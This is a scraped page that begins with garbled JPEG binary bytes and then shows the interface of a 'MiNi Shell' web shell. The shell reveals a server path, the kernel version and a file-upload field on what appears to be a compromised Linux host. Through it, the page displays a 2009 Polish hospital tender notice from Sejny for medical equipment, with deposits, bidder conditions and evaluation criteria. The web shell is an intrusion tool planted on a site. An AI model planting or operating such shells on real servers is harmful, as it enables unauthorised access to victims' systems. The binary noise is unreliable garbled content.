JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090423/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090423/118796-N-2009.html

<p class="kh_header"><b>Sejny: Przetargu nieograniczonego na zakup urządzeń medycznych z podziałem na pięć zadań:
Zadanie 1.   Zakup aparatu do znieczulania z respiratorem dla szpitala SP ZOZ w Sejnach
Zadanie 2.   Zakup stołu operacyjnego dla szpitala SP ZOZ w Sejnach 
Zadanie 3.   Zakup sterylizatorów dla szpitala SP ZOZ w Sejnach
Zadanie 4.   Zakup myjni dezynfektora, stacji uzdatniania wody oraz wózka do przewozu  materiałów sterylnych dla szpitala SP ZOZ w Sejnach
Zadanie 5.   Zakup sprzętu rehabilitacyjnego dla Poradni Rehabilitacyjnej SP ZOZ w Sejnach i materacy przedziwodleżynowych dla szpitala SP ZOZ w Sejnach</b><br>
<b>Numer ogłoszenia: 118796 - 2009; data zamieszczenia: 23.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej w Sejnach , ul. dr. Edwarda Rittlera 2, 16-500 Sejny, woj. podlaskie, tel. 087 5162138, faks 087 5162341.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.sejny.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetargu nieograniczonego na zakup urządzeń medycznych z podziałem na pięć zadań:
Zadanie 1.   Zakup aparatu do znieczulania z respiratorem dla szpitala SP ZOZ w Sejnach
Zadanie 2.   Zakup stołu operacyjnego dla szpitala SP ZOZ w Sejnach 
Zadanie 3.   Zakup sterylizatorów dla szpitala SP ZOZ w Sejnach
Zadanie 4.   Zakup myjni dezynfektora, stacji uzdatniania wody oraz wózka do przewozu  materiałów sterylnych dla szpitala SP ZOZ w Sejnach
Zadanie 5.   Zakup sprzętu rehabilitacyjnego dla Poradni Rehabilitacyjnej SP ZOZ w Sejnach i materacy przedziwodleżynowych dla szpitala SP ZOZ w Sejnach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakup urządzeń medycznych z podziałem na pięć zadań:

Zadanie 1.   Zakup aparatu do znieczulania z respiratorem dla szpitala SP ZOZ w Sejnach.   
Zadanie 2.   Zakup stołu operacyjnego dla szpitala SP ZOZ w Sejnach. 
Zadanie 3.   Zakup sterylizatorów dla szpitala SP ZOZ w Sejnach. 
Zadanie 4.   Zakup myjni dezynfektora, stacji uzdatniania wody oraz wózka do przewozu  
                    materiałów sterylnych dla szpitala SP ZOZ w Sejnach. 
Zadanie 5.   Zakup sprzętu rehabilitacyjnego dla Poradni Rehabilitacyjnej SP ZOZ w Sejnach
                    i materacy przeciwodleżynowych  dla szpitala SP ZOZ w Sejnach.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wadium dla całości zamówienia wynosi: 35 100 zł, słownie: trzydzieści pięć tysięcy sto zł
w tym:
- wadium dla Zadania 1 wynosi:  9 000 zł, słownie: dziewięć tysięcy zł
- wadium dla Zadania 2 wynosi:  4 500 zł, słownie: cztery tysiące pięćset zł
- wadium dla Zadania 3 wynosi:  8 400 zł, słownie: osiem tysięcy czterysta zł
- wadium dla Zadania 4 wynosi:  3 500 zł, słownie: trzy tysiące pięćset zł
- wadium dla Zadania 5 wynosi:  9 700 zł, słownie: dziewięć tysięcy siedemset zł<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Zgodnie z art. 22 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych  tekst jednolity z 2007 r. Dz.U. Nr 223 poz. 1655 z póź. zm.) o udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
-   posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeśli ustawy nakładają obowiązek posiadania takich uprawnień;
-     posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym, i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
-      znajdują się  w sytuacji ekonomicznej i finansowej zapewniającej wykonanie 
       zamówienia;
-     nie podlegają wykluczeniu z postępowania o udzielenie zamówienia
Zamawiający będzie dokonywał oceny spełniania tych warunków na podstawie wymaganych
dokumentów - wymienionych w pkt. 9 Specyfikacji Istotnych Warunków Zamówienia.
Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana wg formuły:
spełnia/nie spełnia. Nie spełnienie chociażby jednego warunku, skutkować będzie wykluczeniem wykonawcy. Ofertę wykonawcy wykluczonego uznaje się za odrzuconą. Zamawiający zawiadomi niezwłocznie wykonawcę o wykluczeniu z postępowania podając uzasadnienie faktyczne i prawne..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Oświadczenie wykonawcy o spełnieniu warunków z art. 22 ust. 1 , art. 23 z dnia 29   stycznia 2004 r. Prawo zamówień publicznych  (tekst jednolity z 2007 r. Dz.U. Nr 223 poz. 1655 z póź. zm.) oraz nie podleganiu o wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 ustawy  z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (tekst jednolity z 2007 r. Dz.U. Nr 223 poz. 1655 z póź. zm.) złożone na formularzu stanowiącym załącznik nr 1 do SIWZ.
2.  W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej
    działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (tekst jednolity z 2007 r. Dz.U. Nr 223 poz. 1655 z póź. zm.)  zamawiający żąda złożenia łącznie z ofertą, w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez wykonawcę, następujących dokumentów:
- Aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem ostatecznego terminu składania ofert;
-   Aktualnej informacji z Krajowego Rejestru Karnego albo równoważnego zaświadczenia
     właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie
     określonym w art. 24 ust. 1 pkt 4 - 8 ustawy z dnia 29 stycznia 2004 r.  Prawo zamówień  
     publicznych (tekst jednolity z 2007 r. Dz.U. Nr 223 poz. 1655 z póź. zm.), wystawionych   
     nie wcześniej niż 6 miesięcy przed upływem ostatecznego terminu składania ofert;
-    Aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 
     1 pkt. 9 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (tekst jednolity z 2007 r. Dz.U. Nr 223 poz. 1655 z póź. zm.), wystawionej nie wcześniej niż 6   miesięcy  przed upływem ostatecznego terminu składania ofert;
-   Aktualnych zaświadczeń właściwego naczelnika Urzędu Skarbowego oraz właściwego
     oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed ostatecznym upływem terminu składania ofert.
3. w celu potwierdzenia, że wykonawca posiada niezbędną wiedzę i doświadczenie oraz    potencjał techniczny, a także dysponuje osobami zdolnymi do wykonania zamówienia, zamawiający żąda złożenia łącznie z ofertą następujących dokumentów:
-   Wykaz wykonanych w ciągu ostatnich trzech lat ( 2006- 2008) podobnych dostaw a jeżeli
     okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim 
     rodzajem i wartością dostawom stanowiących przedmiot zamówienia oraz załączeniem 
    dokumentów potwierdzających, że dostawy te zostały wykonane należycie (załącznik nr 7)
4.  w celu potwierdzenia, że wykonawca znajduje się w sytuacji ekonomicznej i     
     finansowej zapewniającej wykonanie zamówienia, zamawiający żąda złożenia łącznie 
     z ofertą następujących dokumentów:
-    Polisy lub innego dokumentu ubezpieczenia potwierdzającego, że wykonawca jest
     ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności  
      gospodarczej.
5.  Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej    
     Polskiej, zamiast dokumentów, to jest:
-    Aktualnego  odpisu  z  właściwego  rejestru  albo  aktualnego  zaświadczenia o  wpisie do
     ewidencji działalności  gospodarczej, jeżeli odrębne przepisy wymagają wpisu  do rejestru
     lub zgłoszenia do ewidencji  działalności gospodarczej, wystawionego nie wcześniej niż 6
     miesięcy przed upływem terminu składania ofert;
-    aktualnej  informacji z  Krajowego  Rejestru  Karnego  w  zakresie  określonym w  art. 24
     ust. 1 pkt. 9  ustawy  z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (tekst 
     jednolity z 2007 r. Dz.U. Nr 223 poz. 1655 z póź. zm.), wystawionej  nie  wcześniej  niż    
     6 miesięcy przed upływem terminu składania ofert;
-    aktualnych   zaświadczeń  właściwego  naczelnika  urzędu   skarbowego oraz  właściwego
     oddziału  Zakładu  Ubezpieczeń  Społecznych  lub  Kasy   Rolniczego   Ubezpieczenia
     Społecznego  potwierdzających   odpowiednio,  że  wykonawca  nie  zalega  z  opłacaniem
     podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczeń,
     że uzyskał przewidziane prawem zwolnienie, odroczenie lub  rozłożenie na raty  zaległych
     płatności  lub  wstrzymanie  w  całości  wykonania  decyzji  właściwego  organu -
     wystawionych  nie  wcześniej  niż  3  miesiące przed  upływem  terminu  składania  ofert
 -   wykonawca składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę
     lub miejsce zamieszkania, potwierdzające odpowiednio, że:
       1) nie otwarto jego likwidacji ani nie ogłoszono upadłości;
       2) nie orzeczono wobec niego zakazu ubiegania się o zamówienie;
       3) nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne lub
           zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub 
           rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji 
          właściwego organu.
-    jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub
     miejsce zamieszkania, nie wydaje się dokumentów dotyczących wykonawcy;
      1) aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do
          ewidencji  działalności  gospodarczej,  jeżeli odrębne  przepisy wymagają  wpisu do   
          rejestru lub  zgłoszenia do  ewidencji działalności  gospodarczej,  wystawionego nie
          wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
      2) aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24
          ust. 1 pkt. 9 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (tekst jednolity z 2007 r. Dz.U. Nr 223 poz. 1655 z póź. zm.), wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
      3) aktualnych zaświadczeń  właściwego naczelnika  urzędu  skarbowego oraz właściwego
          oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia
Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem
          podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub   zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
lub w zakresie, że;
      4) nie otwarto jego likwidacji ani nie ogłoszono upadłości;
      5) nie orzeczono wobec niego zakazu ubiegania się o zamówienie;
      6) nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne lub
          zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub 
          rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji
          właściwego organu,
      7) aktualnej informacji z Krajowego Rejestru Karnego albo równoważnego zaświadczenia
          właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w 
          zakresie określonym w art. 24 ust. 1 pkt 4 - 8 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (tekst jednolity z 2007 r. Dz.U. Nr 223 poz. 1655 z póź. zm.), wystawionych nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, pozostałe dokumenty są wymagane tak jak dla wykonawców mających siedzibę w Rzeczpospolitej Polskiej.

Wraz z ofertą Wykonawca ma obowiązek złożyć wymagane prawem dokumenty w języku polskim świadczące o dopuszczeniu do obrotu i używania wyrobów medycznych oznakowanych znakiem zgodności CE i numerem identyfikacyjnym jednostki notyfikowanej jeżeli ocena zgodności była przeprowadzona pod jej nadzorem. Dokumenty te: to deklaracja zgodności oraz certyfikat jednostki notyfikowanej, pod nadzorem której była przeprowadzona ocena zgodności..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 90</li>
<li>2 - Cena jednej roboczogodziny wraz z dojazdem serwisu pogwarancyjnego - 10</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.szpital.sejny.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SP ZOZ w Sejnach, ul. Dr E. Rittlera 2, 16-500 Sejny.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.06.2009 godzina 12:00, miejsce: SP ZOZ w Sejnach, ul. Dr E. Rittlera 2, 16-500 Sejny, sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 60 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Podlaskiego na lata 2007-2013
Numer projektu: WND-RPPD.06.02.00-20-014/08
Tytuł projektu: POPRAWA JAKOŚCI USŁUG MEDYCZNYCH POPRZEZ ZAKUP 
SPRZĘTU CHIRURGICZNEGO I REHABILITACYJNEGO DLA SP ZOZ W SEJNACH.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1.   Zakup aparatu do znieczulania z respiratorem dla szpitala SP ZOZ w Sejnach.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 1.   Zakup aparatu do znieczulania z respiratorem dla szpitala SP ZOZ w Sejnach.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0, 33.17.21.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Cena jednej roboczogodziny wraz z dojazdem serwisu pogwarancyjnego - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2.   Zakup stołu operacyjnego dla szpitala SP ZOZ w Sejnach..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 2.   Zakup stołu operacyjnego dla szpitala SP ZOZ w Sejnach..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0, 33.19.22.30-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Cena jednej roboczogodziny wraz z dojazdem serwisu pogwarancyjnego - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie 3.   Zakup sterylizatorów dla szpitala SP ZOZ w Sejnach..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 3.   Zakup sterylizatorów dla szpitala SP ZOZ w Sejnach..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0, 33.19.11.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Cena jednej roboczogodziny wraz z dojazdem serwisu pogwarancyjnego - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie 4.  Zakup  myjni  dezynfektora,  stacji  uzdatniania  wody  oraz  wózka  do przewozu  materiałów  sterylnych  dla  szpitala  SP  ZOZ  w Sejnach..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 4.  Zakup  myjni  dezynfektora,  stacji  uzdatniania  wody  oraz  wózka  do przewozu  materiałów  sterylnych  dla  szpitala  SP  ZOZ  w Sejnach..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0, 33.19.10.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Cena jednej roboczogodziny wraz z dojazdem serwisu pogwarancyjnego - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie 5.   Zakup sprzętu rehabilitacyjnego dla Poradni Rehabilitacyjnej SP ZOZ w Sejnach
                    i materacy przeciwodleżynowych  dla szpitala SP ZOZ w Sejnach..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 5.   Zakup sprzętu rehabilitacyjnego dla Poradni Rehabilitacyjnej SP ZOZ w Sejnach
                    i materacy przeciwodleżynowych  dla szpitala SP ZOZ w Sejnach..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0, 33.15.00.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Cena jednej roboczogodziny wraz z dojazdem serwisu pogwarancyjnego - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com